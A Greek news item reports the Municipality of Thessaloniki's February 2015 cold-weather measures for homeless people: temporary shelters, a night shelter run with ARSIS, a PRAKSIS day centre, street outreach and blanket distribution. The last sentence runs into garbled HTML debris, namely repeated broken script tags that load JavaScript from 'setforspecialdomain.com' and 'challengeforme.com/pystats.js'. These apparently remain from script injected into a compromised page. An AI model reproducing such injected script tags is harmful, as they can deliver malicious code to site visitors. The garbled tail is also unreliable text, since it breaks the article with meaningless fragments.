Θεσσαλονίκη: Μέτρα προστασίας ευπαθών ομάδων λόγω κακοκαιρίας

Θεσσαλονίκη: Μέτρα προστασίας ευπαθών ομάδων λόγω κακοκαιρίας

Ο Δήμος Θεσσαλονίκης ανακοίνωσε μέτρα για την προστασία ευπαθών ομάδων και κυρίως των αστέγων της πόλης, από την κακοκαιρία που πλήττει την περιοχή.

Από τη Δευτέρα (09/02/2015) έως και την Παρασκευή (13/02/2015) θα παρέχεται προσωρινή φιλοξενία στο 2ο και 5ο παράρτημα ΚΑΠΗ, στις οδούς Λαγκαδά 35 και Αλεξανδρείας 27.

Την ίδια ώρα, οι άστεγοι μπορούν να καταφύγουν στο Υπνωτήριο Αστέγων που λειτουργεί σε συνεργασία με τη ΜΚΟ ΑΡΣΙΣ, στην οδό Ανδρέου Γεωργίου 13, από τις 5 το απόγευμα έως την επομένη ημέρα, στις 11 το πρωί.

Επίσης, από τις 10 το πρωί έως τις 8 το βράδυ, έχουν τη δυνατότητα να προφυλαχθούν από την κακοκαιρία στο Κέντρο Ημερήσιας Φροντίδας, που λειτουργεί με τη ΜΚΟ PRAKSIS, στην οδό Μοναστηρίου 62, από τις 10 το πρωί έως τις 8 το βράδυ.

Παράλληλα θα συνεχιστεί η δράση των street workers του ΟΚΑΝΑ και της ΜΚΟ PRAKSIS για τον εντοπισμό αστέγων, καθώς και ο εφοδιασμός των αστέγων με υπνόσακους και κουβέρτες, που θα διανέμει όχημα του Δήμου Θεσσαλονίκης.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >